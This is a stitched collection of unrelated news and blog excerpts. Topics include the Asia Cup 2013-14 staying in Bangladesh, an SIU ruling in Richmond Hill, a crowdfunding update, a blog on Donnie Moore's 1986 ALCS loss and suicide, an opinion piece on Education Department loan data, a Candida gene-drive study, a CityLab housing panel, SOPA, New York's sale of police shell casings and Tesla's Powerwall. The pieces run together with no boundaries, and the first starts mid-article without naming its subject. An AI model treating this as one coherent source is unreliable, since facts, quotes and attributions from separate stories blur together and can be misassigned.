The 31-year-old was released with an injury settlement a few days later. He made the Pro Bowl in 2008 and 2010, recording a career-best seven interceptions in '08. He had 99 tackles and one interception last season.
Griffin will back up Kurt Coleman and Tre Boston.
Isam: BCB will need to get security guarantee from political parties
The Asian Cricket Council has decided that Bangladesh will remain the host of the Asia Cup 2013-14. The other big news to emerge from the ACC's meeting in Colombo is that Afghanistan will be the fifth team in the competition. A total of 11 matches will be played in the tournament with the opening game expected to be on February 25 and the final on March 8, 2014.
"As of now, the decision has been made that Bangladesh will retain hosting rights of the Asia Cup," BCB's acting CEO Nizamuddin Chowdhury said. "We had a good meeting with ACC board members, and they have been convinced that we can host the tournament. Afghanistan has also been added to the tournament, making it a five-team event and the number of matches has gone up to eleven."
Bangladesh's status as a host nation was in doubt following recent political turmoil. In December, the West Indies Under-19s team had pulled out of their tour after an explosion near the team hotel. Apart from the Asia Cup, Bangladesh are scheduled to host Sri Lanka for a bilateral series and will also stage the World Twenty20 from March 16.
Syed Ashraful Huq, the chief executive of the ACC, said the members did not have any specific questions or reservations about the security arrangements around the tournament being held in the country: "Bangladesh submitted a detailed security plan to the ACC. If any member has any other concerns, they should address it with Bangladesh."
ESPNcricinfo understands that concerns were unofficially raised by the PCB about the security situation, with regards to the Pakistan team being in Bangladesh in the current political climate. Regardless of the announcements from the meeting, it is expected that further discussions on the matter will take place in Dubai on January 9 during an ICC executive board meeting, and a question mark remains over Pakistan's participation in the Asia Cup. "They feel it is still a delicate situation," an ACC member said. It is understood that the PCB will seek advice from its government before making its mind up.
Afghanistan have been added to the Asia Cup to give them more exposure ahead of the World Twenty20 and the 2015 World Cup © ICC/Getty
The PCB's concerns have arisen in light of the diplomatic row between the governments of Pakistan and Bangladesh. The issue concerns the trial of 1971 war criminals in Bangladesh, which is taking place more than four decades after Bangladesh's independence from Pakistan.
The ACC's decision will give the BCB enough impetus to convince Sri Lanka Cricket of going through with the bilateral series, which is scheduled to begin on January 27. Jayantha Dharmadasa, the SLC chairman, said a decision on the tour would be made soon.
"Sri Lanka are also due to tour Bangladesh from January 24, and SLC is presently conducting its own security appraisal. A final decision on whether that tour will go ahead as scheduled will be made on January 9," Dharmadasa said.
The ICC, too, will hold security inspections in Bangladesh, before deciding whether to retain Bangladesh as the host for the World Twenty20.
The political situation in Bangladesh - general elections are to be held this week - and the resulting violence across the country had raised concerns over whether the tournaments could be held in the country. Although the issue was not discussed formally, it is understood that with the Asia Cup going ahead without any hiccups, the World Twenty20, scheduled to start after the Asia Cup, will be held in Bangladesh across the three venues finalised by the ICC.
Huq said the schedule would be finalised soon, considering Afghanistan would need to be slotted in. According to Huq, Afghanistan were included to provide them with more exposure: "They are playing very well and have got ODI status from the ICC, and the Asia Cup will help them prepare for both the World Twenty20s and the 2015 World Cup."
Apart from finalising Bangladesh as a host, the ACC also awarded broadcast rights for this edition of the tournament to Star India. It has cut ties with Nimbus, the previous broadcast partners.
The meeting in Colombo was chaired by BCCI president N Srinivasan, who is also chairman of the ACC. PCB CEO Subhan Ahmed, Dharmadasa and SLC secretary Nishantha Ranatunga, BCB president Nazmul Hassan and acting CEO Nizamuddin Chowdhury along with presidents of the Singapore, Thailand and Bhutan cricket associations attended the meeting.
Mohammad Isam is ESPNcricinfo's Bangladesh correspondent. He tweets here; Nagraj Gollapudi is an assistant editor at ESPNcricinfo
© ESPN Sports Media Ltd.
The Canadian Press
RICHMOND HILL, Ont. - Ontario's police watchdog has cleared a York region police officer whose cruiser came into contact with a hit and run victim north of Toronto this month.
The Special Investigations Unit says while there's a possibility the collision played a role in the victim's death, there is no indication the officer drove in a dangerous manner.
The SIU says a 30-year-old man wearing dark clothes was walking along Yonge Street in Richmond Hill around 3:30 a.m. on Nov. 1 when he was struck by a Mercedes SUV.
It says the SUV then took off, leaving the man on the road. Police have since arrested the driver.
The agency says another vehicle struck the man and the driver pulled over to call police.
The officer responding to the call also "came into contact" with the man, who was later pronounced dead at the scene.
Thank you! You did it! Sacred Fire is funded and it's all thanks to you.
Every single one of you made it possible.
It seems to me like it was yesterday, but we launched the campaign already 25 days ago. It's been 4 weeks filled with hard work, little triumphs, anticipation and not so much sleep. :)
And it was all worth it. There's over 1,100 people who want to see Sacred Fire becoming a reality. We're humbled and thankful.
.
What's amazing, there's still 3 days to go. So what's next?
It's not just about the stretch goals. The bigger success the campaign is, the easier it is for us to attract talent and partners. This will leave us with more time to make the core experience better, work on polish and balance and add choices and replay value.
We are looking forward to making a great game for you.
We've made a big step in creating a strong and dedicated community. We are excited to see there are people who appreciate innovation and storytelling. Thank you for your feedback, we couldn't have wished for a better community.
Let's make Sacred Fire the best it can be!
To recap, here's the next stretch goal to further enhance Sacred Fire experience.
.
One of Sacred Fire's strengths is its unique visual style and focus on character creation. It's the deepest and most thought out design aspect of Sacred Fire, as it allows you to develop your own playstyle and create your own hero. So our first stretch goal expands this fundamental part of the game and gives you even more self-expression options with focus on variety of:
colors, outfits and hairstyles,
faces, scars and paint patterns,
jewelry and more awesome beards.
So how far can we go?
The story is yours to tell. :)
Your very happy poetic team,
Andrej & Martin
by
Michael Keaton's latest film, Birdman, looks promising and I can't wait to see it. The Pittsburgh native has always been one of my favorite actors. The other night I was reading about Birdman on the Internet before going to bed. I waste way too much time reading about movies. I usually decide it's too late to watch one, but then I spend three hours on the Internet reading stupid shit.
By the way, for your convenience I ranked the 10 best Michael Keaton movies:
10. Gung Ho
9. My Life
8. Multiplicity
7. The Paper
6. Jackie Brown
5. Beetlejuice
4. Live from Baghdad
3. Mr. Mom
2. Batman
1. Night Shift
I'm sorry to say I have never seen Clean & Sober, so I had to leave it off the list. It was also hard to omit The Dream Team. I was in high school when I saw it and thought it was the greatest movie ever. But it doesn't hold up as well as his other comedies. I also saw Night Shift for the first time when I was in high school and it stuck in my mind because it was freaking hilarious and there were so many boobs. Now I hate when movies have nudity. It's too much of a distraction. If I see Nicole Kidman's ass I cannot focus on anything else for the rest of the movie. I NEED THAT ASS. Vera Farmiga's ass ruined Up in the Air for me.
Anyway, I was on Keaton's IMDB page when I noticed he was in a movie called Game 6 which takes place in New York City during game 6 of the World Series on October 25, 1986 between the Boston Red Sox and the New York Mets. Of course that game is memorable because of Bill Buckner's error (the Red Sox were winning the series 3-2 and the game was tied with two outs in the 10th with a man on 2nd when Mookie Wilson hit a ground ball up the first baseline. It should have been a routine out for first baseman Buckner, but it rolled through his legs and the Mets scored the winning run. They went on to win the series in the 7th game). As I was reading about this movie, I came across a message board comment recounting the details of that year's ALCS and the tragic tale of Donnie Moore, pitcher for the California Angels. I was a little kid back then and I knew all about Buckner's error. I was too young to stay up for it, but I vividly remember my parents telling me about it the next day. We've all seen the video. I've even showed my kids– trying to teach them that even professionals make mistakes. I have never heard about Donnie Moore, though, and what happened to Buckner is nothing in comparison.
The Angels were beating the Red Sox 5-2 in the 9th inning of game 5 of the 1986 ALCS. They were at home and leading the series 3-1. Gene Mauch, who played second base for the Pittsburgh Pirates in 1947, was the manager of the Angels. He was in his 25th season as an MLB manager and had set a record for most wins by a manager without ever reaching the World Series. A record that still stands by a wide margin. Here he was with a 3 run lead and just 3 outs away; but it wasn't going to happen for him. Don Baylor hit a 2 run home run with one out, to pull the Red Sox within one run. After the second out of the inning, with a man on first, Mauch called upon Donnie Moore, their right-handed closer to face a struggling Dave Henderson, a right-handed batter. It seemed like an easy out for Moore, who had been an Star in 1985. The count was 2-2. The Angels were one strike away from the World Series and the crowd was on their feet when Henderson hit the next pitch high and deep to left field– another 2 run homer. The Red Sox took the lead, 6-5. It gets crazier.
The Angels actually tied the game in the bottom of the inning, seemingly getting Moore off the hook. They then had a golden opportunity to win the game with one out and the bases loaded, but they left the runners stranded. Moore remained in the game. Neither team scored in the 10th and then Moore let in a run off a sacrifice fly in the top of the 11th. Rarely does a relief pitcher get to blow it TWICE in the same post season contest. The Angels couldn't score in the bottom of the inning and then got blown out in games 6 and 7. The Red Sox had won the pennant– two clutch 2-run home runs in the 9th inning of game 5– an improbable comeback. Gene Mauch would never reach the Series and for Donnie Moore things would get even worse.
Moore had issues with injuries, alcohol, depression and was rumored to be abusive to his wife Tonya. Lots of people (including some teammates) speculated that game 5 of that ALCS led to his downfall. He was mercilessly blamed for the loss by fans and media and accepted full responsibility. Others point to his injuries as the source of his off-field problems. In 1988 he was released by the Angels. He struggled in 1989 and found himself in the Kansas City Royals minor league system. At this point, he was also having financial issues– his income not keeping pace with his lavish lifestyle. Even his agent filed a grievance against him for unpaid commissions. His health was still an issue and he was released by the Royals in June of 1989. 25 years ago, on July 18, 1989 he shot his wife.
They were rumored to be separated at the time, however they were together in their Anaheim home with their three children on that day. They started to argue and Moore pulled out a gun and shot her three times in the chest and stomach. Their horrified 17 year old daughter drove Tonya to the hospital where she arrived in critical condition. Remarkably, she survived. It was even reported that despite her injuries, she walked from the car to the emergency room under her own power. She would eventually make a full recovery. Back at the house, alone with his two sons, a 7 year old and 10 year old, Moore shot himself in the head and died. The younger son was in the same room with him when it happened and called 911. I can't imagine what those kids have been through– seeing their father shoot their mother and then himself. We will probably never know how much of a factor the 1986 ALCS Game 5 was in this terrible tragedy. In a New York Times article about the events, Loren Coleman, a research associate for the University of South Maine who studied MLB suicides, was quoted as saying ”It's never just one thing that precipitates suicide.” Many of his teammates said he took the loss very hard, though, and he never got over it. As horrible as these shootings were, and despite Moore's notoriety as a former MLB player, this wasn't even the biggest story in California that day. Another high profile shooting would dominate the news.
21 year old actress Rebecca Schaeffer was killed on July 18, 1989, the same day that Donnie Moore shot his wife and committed suicide. Schaefer was shot in the doorway of her Los Angeles apartment by a stalker named Robert John Bardo, who is serving a life sentence in prison. Marcia Clark, of OJ Simpson-trial fame, prosecuted Bardo. Schaeffer had appeared in a few movies, but was probably mostly known for her role in the sitcom My Sister Sam. Her murder was chronicled in the first episode of E True Hollywood Stories. (Unfortunately, that is probably what she is most widely recognized for.) There was some good that came out of this tragedy, however, as California immediately enacted some anti-stalking laws. The murder and subsequent arrest of Bardo relegated the Moore suicide to second billing. She was a beautiful, young Hollywood starlet killed by a lunatic and he was a disgraced former pitcher who tried to kill his wife.
I started the other night reading about Michael Keaton movies when I came across one called Game 6 and a message board comment about that year's ALCS and the pitcher who killed himself. I read as much as I could about Donnie Moore for the first time that night. What a shitty night. As I sit here watching this year's World Series, I'm dumbfounded looking back at the 1986 post season and the events that unfolded afterward. Bill Buckner, Gene Mauch, Dave Henderson, Donnie Moore, Tonya Moore, Rebecca Schaeffer, Robert John Bardo and Marcia Clark — all connected in a bizarre and tragic series of events.
Follow us on Twitter.
Comments
comments
What a confidence builder, eh? This looks more like a confidence game, though, in support of the Obama administration's war on for-profit schools. The Wall Street Journal's editorial board blasts the Department of Education for waiting months to disclose that they had made a huge error on student-loan defaults, even while issuing regulations that hammered for-profit schools on the basis of that error:
In early January the department disclosed that it had discovered a “coding error” that incorrectly computed College Scorecard repayment rates—that is, the percentage of borrowers who haven't defaulted and have repaid at least one dollar of their loan principal. The department says the error “led to the undercounting of some borrowers who had not reduced their loan balances by at least one dollar.” The department played down the mistake, but the new average three-year repayment rate has declined by 20 percentage points to 46%. This is huge. It means that fewer than half of undergraduate borrowers at the average college are paying down their debt.
Prior to this admission, the Department of Education had claimed that only a third of all student loans had never begun repayment — but that the rate soared to over half at for-profit schools. Based on that calculation, DoEd finalized a rule that required those schools to post a warning in all of their promotional materials to the effect that their students tended to be deadbeats. State-based and non-profit private colleges are exempted from those disclosures, based on the bad math performed by the DoEd.
However, it wasn't just bad math, as the WSJ's editorial board points out:
Marc Jerome, president of for-profit Monroe College in the Bronx, discovered the Scorecard rate inflation last August. In several emails to Education officials, he urged the department to hold off on finalizing the regulation. If the regulation were applied evenly, a large number of nonprofit and public institutions would fail to meet the standard. But then the justification for the department's selective regulation of for-profits would vanish. The department finalized the regulation in October anyway, perhaps anticipating a Hillary Clinton victory that would allow the repayment inflation game to keep going. Yet now it's taking credit for discovering and fixing the Scorecard error that likely would have been uncovered by the new Trump Administration.
Call it … bad math with a purpose. Had it just been a routine “coding error,” and without any malice, then Jerrome's repeated entreaties pointing out the problem would have resulted in a correction and a new report. This looks more like a deliberate attempt to cook the books in order to blame student-loan defaults on poor career performance for those who matriculate from for-profit schools. Instead, we now know that long-term performance, as measured by student-loan defaults, looks about the same between the for-profit and not-for-profit education centers. That knowledge would have undercut the regulatory hostility toward the former for almost the entirety of the Obama administration, which is why the DoEd only revealed it on Barack Obama's entry into retirement.
Betsy DeVos should make investigating this a top priority after her confirmation as Education Secretary, which will come soon. Democrats continue to demagogue her, but they're doing a terrible job of it, as the Washington Post's Glenn Kessler discovered when looking into attacks by Maxine Waters on DeVos. Waters declared at the Women's March Saturday that DeVos had “never seen the inside of a classroom,” which Kessler called “ridiculous”:
DeVos has been attacked for not having much of a connection to public schools. She did not attend public schools, and neither did her children. They attended privately funded Christian schools, and DeVos has advocated expanding charter schools. But DeVos has also been involved in the Grand Rapids Public School system in Michigan. “I've worked as an in-school mentor for students in the Grand Rapids Public Schools, and have had the privilege of interacting with students and their families and teachers in ways that have changed my life and my perspective about education forever,” she said in her opening statement at the Senate hearing on her nomination. Indeed, Teresa Weatherall Neal, superintendent of the Grand Rapids Public School district, has praised the selection of DeVos. “I'm really excited for the children across the nation,” Neal told MLive.com. “She has been a wonderful supporter of GRPS and our transition plan. She knows education. She knows what it is going to take in order for our kids to be helped.” … DeVos sparked questions about her knowledge of education issues during the contentious hearing on her nomination. But Waters goes too far when she asserts, without evidence, that DeVos has never seen the inside of a classroom. Maybe Waters believes that private schools don't count, but it's clear that DeVos has seen the inside of public-school classrooms, as well. If she was trying to say DeVos had never been an educator, she still went too far. This kind of over-the-top rhetoric earns Four Pinocchios.
Can we also add a dunce cap to the Department of Education for not being able to do basic algebra?
Gene drives have received their fair share of controversy in the past several years, as the technology has evolved to the point of where it could push a species to the point of extinction, which has been argued by some—in the case of malaria-carrying mosquitoes—to be an ecological risk worth taking. Yet, gene drives need not be an all-or-nothing approach with respect to pathogen resistance. The investigators at the Wyss Institute for Biologically Inspired Engineering, within Harvard University, have developed a CRISPR/Cas9-based gene drive platform to address growing drug resistance in the fungal pathogen Candida albicans. Findings from the new study were released today in Nature Microbiology, in an article entitled “A CRISPR–Cas9-Based Gene Drive Platform for Genetic Interaction Analysis in Candida albicans.”
C. albicans is a notorious human fungal pathogen that causes thrush and serious systemic infections. Opportunistic C. albicans fungi, which often live inconspicuously in the normal flora of human skin and gut, can switch from their harmless stealth mode to become aggressive pathogens, especially in people whose immune systems are already compromised by pre-existing diseases or harsh drug therapies. They can also form biofilms on medical devices, such as catheters and stents in the human body, leading to infections and sometimes death. The threat posed by both free and biofilm-bound forms of the pathogen is constantly growing, as virulent C. albicans strains are becoming increasingly resistant to the few drugs that are available to treat them.
Since the pathogenic yeast are diploid organisms—as they typically contain two copies of their entire genome—they are notoriously difficult to eliminate. To understand the role that a specific gene plays, researchers need to be able to delete both copies at the same time, allowing them to observe the effects of the gene's total absence, which has been a difficult challenge in C. albicans. Additionally, genes often play very similar and sometimes redundant roles in many processes, including drug resistance and biofilm formation, meaning that more than one gene needs to be deleted to identify those genes whose functions are linked.
This image shows multicolored diploid Candida albicans fungi growing on an agar plate with red-colored colonies indicating that two copies of a marker gene have been effectively deleted by the gene drive. [Wyss Institute at Harvard University]
Noted Wyss Institute professors George Church, Ph.D., and James Collins, Ph.D., along with their colleagues, approached the gene deletion challenge in C. albicans by creating a CRISPR gene drive platform for developing diploid strains of the pathogen in which both gene copies could be efficiently deleted. The researchers are hopeful that the technique may lead the way toward a better understanding of drug resistance and biofilm-forming mechanisms, and through future research, it could help pinpoint new drug targets and combination therapies.
The team took advantage of a recently discovered very rare haploid form of C. albicans, which, like those of other fungi, only contains one set of chromosomes with one copy of each gene, but they can be mated to easily create the diploid form
“We used haploid C. albicans strains and replaced genes that we wanted to eliminate with a gene drive that we previously developed and adjusted to the specific biology of C. albicans,” Dr. Church explained. “After mating, these 'selfish genetic elements' proceed to replace the normal copy of the gene in the diploid fungi. The approach worked so efficiently that it enabled us to even delete pairs of different genes simultaneously with higher throughput and to explore whether their functions are related.”
The new gene drive approach is based on the CRISPR/Cas9 system, in which a DNA-cutting Cas9 enzyme is targeted to two regions that flank a gene in haploid C. albicans fungi by two so-called guide RNAs (gRNAs). After the targeted gene sequence has been cut out, an engineered gene drive cassette expressing all Cas9 and gRNA components is inserted in its place. When two haploid fungi are mated to form diploid offspring, the gene drive will also substitute the gene's counterpart in the other chromosome, effectively deleting the original version from the organism entirely. By applying their gene deletion approach, the team was able to identify combinations of genes that act synergistically in defying certain drugs, or in triggering biofilm formation.
“For example, deleting either the two-efflux pump-encoding genes CDR1 and CDR2, or TPO3 and CDR2 together, rendered C. albicans highly sensitive to fluconazole and other antifungal drugs, suggesting that targeting two mechanisms at the same time could help overcome drug resistance,” noted co-lead study investigator Rebecca Shapiro, Ph.D., a postdoctoral fellow in Dr. Collins' team. “In biofilm formation assays, we also found that loss of the ALS3 adhesion factor gene synergizes with the loss of several other adhesion factor genes, which makes it a highly interconnected hub of biofilm adhesion and an interesting candidate to further explore.”
The investigators were excited by their findings and are extremely optimistic that their study will offer new inroads into understanding the difficult territory of C. albicans pathogenesis and drug resistance.
“We can now get a much better handle on how genetic networks that underlie the virulence of C. albicans are organized, see how they respond to specific environmental and drug perturbations, and thereby uncover new vulnerabilities that in the future may lead to new drug targets and combination therapies,” concluded Dr. Collins. “Moreover, our gene drive array platform can be a blueprint for similar approaches in other fungal pathogens, such as the newly emerging Candida auris, which is highly drug-resistant and has already been marked as a threat by the CDC.”
Jonathan Woetzel of McKinsey, Ben Hecht of Living Cities, Vishaan Chakrabarti of SHoP architects, and Mike Alvidrez of the Skid Row Housing Trust at The Atlantic's CityLab 2014 summit.
The unshakeable misconception that rural taxpayers subsidize their citydwelling counterparts has an enormous bearing on affordable-housing policy. Dense cities that get affordable housing right—namely Singapore —enjoy home rule. Singapore spends a great deal of money subsidizing public housing for more than 80 percent of its residents, an outcome that would be unthinkable in even the most liberal dense U.S. city (and indeed is very far from the case ).
"It's all of those single mothers in the housing projects," he said, paraphrasing the haters. "The problem is that the data does not bear that out one bit."
Any time, though, that Chakrabarti writes about government and decentralization and redistribution—topics that framed a discussion about affordable housing at The Atlantic's CityLab 2014 conference this week in Los Angeles—he gets loads of hate mail.
Chicago generates more GDP than 42 states, according to Vishaan Chakrabarti, a partner at SHoP Architects and director of the Center for Urban Real Estate at Columbia University. New York City generates billions of dollars in economic activity per square mile. "We should have plenty of money to build affordable housing," he said. "We don't, because we distribute it."
"Subsidize the supply, subsidize the demand: We know how to do all of those. We just don't have the will to do those things," said Living Cities CEO Ben Hecht. "Singapore and Hong Kong are willing to do those things."
"In Hong Kong, the people who run the subway also run the housing," Chakrabarti said. "It makes so much sense." (Other things about Hong Kong do not make so much sense.)
So, I'll bite: How much better off would cities be without states? Or even nations?
When I asked a question along those lines (whether state or federal governments provide any value to city governance), I wasn't met with the pushback that I expected. "The history [for New York City] goes back to Al Smith and Robert Moses," Chakrabarti said. Late 1970s New York City was bankrupt, while the state was in "pretty good shape" owing to its agrarian economy and government. The critique of urban dependence paid for by a rural Protestant work ethic set in there as it did elsewhere in the U.S. It still persists. It's just no longer true, strictly speaking.
"This is one where we totally screwed it up," Hecht said, "by allowing the states to be the ones to decide how small you can go. We have thousands of political jurisdictions in a given state, let alone in a region. Every one of those has an elected official sitting in the capital of the state. It's a huge obstacle to what we're talking about."
Renters of the world, unite!, right? Maybe not exactly. Their arguments weren't that much pinker than the average respondent to the Atlantic Media/Siemens State of the City Poll. Americans are pretty content with the quality of local government they receive, and they're much more likely to attribute good government services to local government (as opposed to state or federal government), according to the poll results.
Chakrabarti acknowledged that home rule or city-secession—!!—wouldn't necessarily make for affordable housing that residents in Chicago or L.A. or New York would accept. (Those cities, by the by, are three of the eight U.S. metro areas that stand head-and-shoulder with whole nations among the world's 40 highest producing economies on the planet.) "I don't think most Americans want to live on the streets of Hong Kong," he said. "They may be wrong and pigheaded about that."
Every major U.S. city looks a little bit like Singapore in one specific way: They enjoy one-party rule. "Virtually every major mayor in this country is from one party," Chakrabarti said. "Even in the deepest red state, the cities are this bastion of blue voting.
"It's not the hinterlands subsidizing the cities," Chakrabarti says, "it's the cities subsidizing the hinterlands."
The Atlantic, the Aspen Institute, and Bloomberg Philanthropies are hosting"CityLab 2014: Urban Solutions to Global Challenges," in Los Angeles on September 29 & 30. Find CityLab.com's full coverage here.
While it might not have as great of an impact as the Mature Video Game Law would have had it been passed, the effects of the Stop Online Piracy Act will be felt for a long time to come if it passes. Though some might not be familiar with SOPA (as it is more commonly known) there are those who have made an informed decision whether or not to support the act.
Among those individuals and organizations that support SOPA are dozens of video game related companies — from Epic Games all the way down to Nival — who have made the bold choice to show their hand, and reveal their stance to their fans. Some have felt the sting of supporting SOPA, while others have preemptively dropped support lest their products suffer in the market.
But ultimately there are still a ton of companies that support the Act, and those who do not and to help clear the issue of who is for and who is not, Rock Paper Shotgun has put together a handy list of many prominent game publishers and developers and indicated what their stance is. Even with this list there are still those publishers, like Sony and Nintendo, who are against the act as one entity, but are also for it because they are members of the ESA.
You see, this whole SOPA support issue is much more complicated than any one company wants people to believe. There are plenty of companies who have come out in support of the bill, like Microsoft, but are also members of organizations that are against it.
I'm not hear to preach about SOPA and tell you that it's wrong, and whoever supports it is an enemy, just trying to lay out some extra facts. Once you've read up on SOPA, and have made your own informed decision, then head on over to Rock Paper Shotgun's handy list, which they intend to update as new information arises, and see where your favorite video game companies stand.
What is your stance on SOPA and how do you feel about certain game companies supporting the Act? Can the gaming public at large influence the opinions of publishers and developers?
Source: Rock Paper Shotgun
Mr. Bloomberg's national coalition, Mayors Against Illegal Guns, ranked Georgia as having the 10th highest rate of crime-gun exports in 2009. In 2006, New York sued 28 gun dealers who had sold guns used in hundreds of crimes in the city. Eight of those dealers were from Georgia.
Photo
Georgia Arms sells ammunition online; its 1,000-round boxes are called Canned Heat.
The mayor's office, for its part, was unapologetic when informed of the sale.
John Feinblatt, the mayor's chief policy adviser and the lead architect of Mayors Against Illegal Guns, said Mr. Bloomberg stood behind the sale and would allow similar sales in the future.
“He believes, as do all members of Mayors Against Illegal Guns, that our purpose is to keep guns out of the hands of criminals, not keep guns or ammunition away from law-abiding citizens,” Mr. Feinblatt said. “There's a big distinction between legal dealers and illegal dealers and criminals and law-abiding citizens.
“We're about crime control. We're not about gun control.”
Mr. Feinblatt said dealers in guns and ammunition in Georgia should not all be painted with a “broad brush” because of those who have acted illegally. He said he did not know whether any background check was done on Georgia Arms before the sale.
The sale to an ammunition store appears to be new ground for the city. The previous four sales of shell casings dating to 2010, based on the data available on Tuesday, were to scrap metal companies in New York State . In all cases, the shells were sold to the highest bidder, as the city says is required by law. There has been one sale of shell casings since the Georgia sale, and it was to a scrap metal company.
The shell casings come from the Police Department's firearms and tactics section in Rodman's Neck in the Bronx , where officers shoot on a firing range. At the end of a shooting session, officers gather their spent shell casings and drop them in large barrels. When enough barrels are filled, they are given, like much of the city's scrap and surplus, to the city's Department of Citywide Administrative Services, which buys, manages and maintains property for the city.
Photo
An invitation for bids for 28,800 pounds of “once-fired assorted caliber cartridge cases” was advertised in the publication The City Record for several days in May and June. Georgia Arms bought the cases for $69,696 on June 5, according to the department.
Advertisement Continue reading the main story
In past sales, the scrap metal companies paid a bit less, $59,040 to $67,680, for loads of casings, said Julianne Cho, a spokeswoman for administrative services.
Georgia Arms does not sell guns, only ammunition and supplies. It has not been the subject of any criminal investigation, said Wayne Smith, a special agent in charge with the Georgia Bureau of Investigation. The company has bought casings from the United States military.
Newsletter Sign Up Continue reading the main story Please verify you're not a robot by clicking the box. Invalid email address. Please re-enter. You must select a newsletter to subscribe to. Sign Up You will receive emails containing news content , updates and promotions from The New York Times. You may opt out at any time. You agree to receive occasional updates and special offers for The New York Times's products and services. Thank you for subscribing. An error has occurred. Please try again later. View all New York Times newsletters.
It is in rural Villa Rica, Ga., about 40 miles west of Atlanta . A sign on the door reads: “No solicitors means no solicitors. Remember this is an ammunition company.” Bullets marked “factory loaded” are under a glass counter for sale to walk-in customers. A clerk behind the counter said he did not know how much of the store's supply came from New York.
The owner of Georgia Arms, Larry Haynie, did not respond to calls and e-mails requesting comment.
Buyers of handgun ammunition must be at least 21, but beyond that, the requirements are few.
“Be standing in front of the counter and breathing,” said Jerry Henry, executive director of GeorgiaCarry.org , which says it fights “to reclaim and expand our right to bear arms.”
“They sell an awful lot of reloads at gun shows,” Mr. Henry added. “They sell whatever they can, just like the rest of us, trying to make a dollar.”
House Republicans today agreed to a sweeping moratorium on all funding requests for pet projects, known as earmarks.
The move, approved in a closed-door meeting, is an escalation of efforts by Democrats and Republicans to claim the higher ground on ethics in advance of November's midterm congressional elections. But it also marks aggressive action to clamp down on a controversial practice that critics argue has opened the door to corruption by encouraging lobbyists seeking earmarks for their clients to donate campaign money to lawmakers.
The Republican ban is not permanent but a one-year moratorium on inserting the special projects into spending bills, The Associated Press reports.
The GOP decision comes a day after the Democrats who control the House announced a ban on earmarks directed to private companies. Democrats said they still would allow lawmakers to direct billions in federal spending to nonprofit and government entities, such as universities.
In a statement today, House Minority Leader John Boehner, R-Ohio, said:
For millions of Americans, the earmark process in Congress has become a symbol of a broken Washington. Today House Republicans took an important step toward showing the American people we're serious about reform by adopting an immediate, unilateral ban on all earmarks. But the more difficult battle lies ahead, and that's stopping the spending spree in Washington that is saddling our children and grandchildren with trillions of dollars in debt. Only then will we have succeeded in bringing fundamental change to the way Congress spends taxpayers' money.
As we reported in today's paper, how much the new rules will reduce earmark spending is unclear. Within hours of Wednesday's announcement by top Democrats, the Senate's top appropriator, Sen. Daniel Inouye, D-Hawaii, voiced opposition.
Earmark foes in the Senate are calling for action in that chamber.
Sen. John McCain, R-Ariz., said he would offer an amendment today to ban all earmarks "until our budget is balanced and we've eliminated our massive deficit."
Updated at 2:15 p.m. ET: Steve Ellis, a vocal earmark critic at the nonprofit Taxpayers for Common Sense, said the moves by both parties in the House could reduce the normal "deluge" of earmark requests by individual lawmakers to a "medium size stream."
There were 1,208 earmarks worth $1 billion solely sponsored by House Republicans in the current federal fiscal year, Ellis' group found. Democrats said lawmakers directed about 1,000 earmarks worth $1.7 billion to private companies this year, a practice now banned by their new rule. Together, the changes could add up to a "pretty substantial whack" on earmarks, Ellis said.
Why all the rush to change the rules? Earmark requests from House members are due Friday to the House Appropriations Committee.
(Posted by Fredreka Schouten)
The Tesla Energy Powerwall Home Battery is unveiled by Tesla Motors CEO Elon Musk during an event in Hawthorne, California April 30, 2015. REUTERS/Patrick T. Fallon
This story has been updated.
Late Thursday, Tesla unveiled a suite of new battery products for homes, business, and even utility scale applications. The home product, dubbed the Tesla Powerwall, will store either 10 kilowatt-hours worth of energy (for $ 3,500) or 7 kilowatt-hours (for $3,000).
Importantly, though, these costs do not include the cost of installing the battery or the cost of a power inverter, meaning that what a customer actually pays could be substantially more. The company says it will start to deliver the batteries in “late summer.”
For those closely following developments in the energy storage space, there are two key details here that are worth considering — the cost of the battery itself, and what it would actually mean to have 10 kilowatt-hours of backup energy or energy storage in your home.
[Why Tesla's announcement is such a big deal: The coming revolution in energy storage]
When it comes to price, these numbers are hardly cheap, but they're also lower than some analysts were suggesting — figures like $13,000 were common in press coverage prior to Tesla's announcement.
“The price points of the two Powerwall options for residential and small commercial segments will surely give minor jolts to the industry,” Ravi Manghani, an analyst with GTM Research, said in a statement. The prices are “slightly lower than what the world has come to expect of an expensive electric vehicle manufacturer. This announcement is expected to result in similarly aggressive price offers by other storage technology and system vendors.”
The number is “well under the prices we and other research organizations have been looking at. Very exciting,” added Jesse Morris, a manager in the transportation and electricity programs of the Rocky Mountain Institute, a prominent energy think tank.
In addition to price, what homeowners will really care about is just how much backup power this product actually gets them — or how much it adds to the amount of solar-sourced energy that they can use to power their homes. Some simple numbers here can provide some context.
According to the U.S. Energy Information Administration, the average annual kilowatt-hour use for a U.S. utility customer (in the year 2013) is 10,908, or 909 kilowatt-hours per month. Divide that by 30 and per day, an average U.S. customer uses about 30 kilowatt-hours. So the battery could cover roughly a third of this.
However, that's too simplistic an analysis, because really, a few key home appliances use up particularly large amounts of energy. For instance, running the laundry on “hot wash, warm rinse” takes up about 4.5 kilowatt-hours. Other devices, like your laptop computer or your TV, take up a lot less.
So what this means is that while 10 kilowatt-hours is probably not enough to power your whole home and all its utilities, as backup, when you're not running the more energy hungry stuff, it would last for a while.
“If you were trying to go off grid with this, that would be a bit of a challenge,” says Peter Lilienthal, the CEO of Homer Energy, which co-authored a recent report with the Rocky Mountain Institute on the future of solar plus battery systems in homes. “It really isn't designed for someone to cut the wire…But if you're just concerned with outages — I'm not baking in my electric oven during the outage — 10 kilowatt hours is plenty for your lights, your electronics, and an efficient refrigerator.”
Granted, the people buying these $ 3,000 plus batteries aren't likely to be average — they probably have larger homes, which use more energy.
And then there's the matter of pairing up these batteries with solar panels. As Tesla notes, the key problem for home solar right now is that the most electricity use in the home generally occurs in the morning and especially in the evening — before work, after work. This just so happens to be precisely out of sync with when the sun itself is delivering the most accessible power (the middle of the day).
Thus, one idea behind pairing a home battery with solar panels is to store solar energy harnessed during the day and then deploy it in the evening, overnight, and the next morning. While the battery might not cover all energy uses during these times, it could reduce how much power needs to be purchased from a traditional utility and drawn from the grid.
But that's not how the batteries will be used at first, says Peter Rive, co-founder of Solar City, which is offering the batteries for an additional cost when customers install solar panels. At first, Rive says, the battery will serve as a backup for when power goes out. But the ambitions are larger, and could eventually involve also helping customers use solar-sourced power in their homes even when the sun is no longer shining.
“We want to have batteries deployed with all of our solar power systems by the end of the decade,” says Rive.
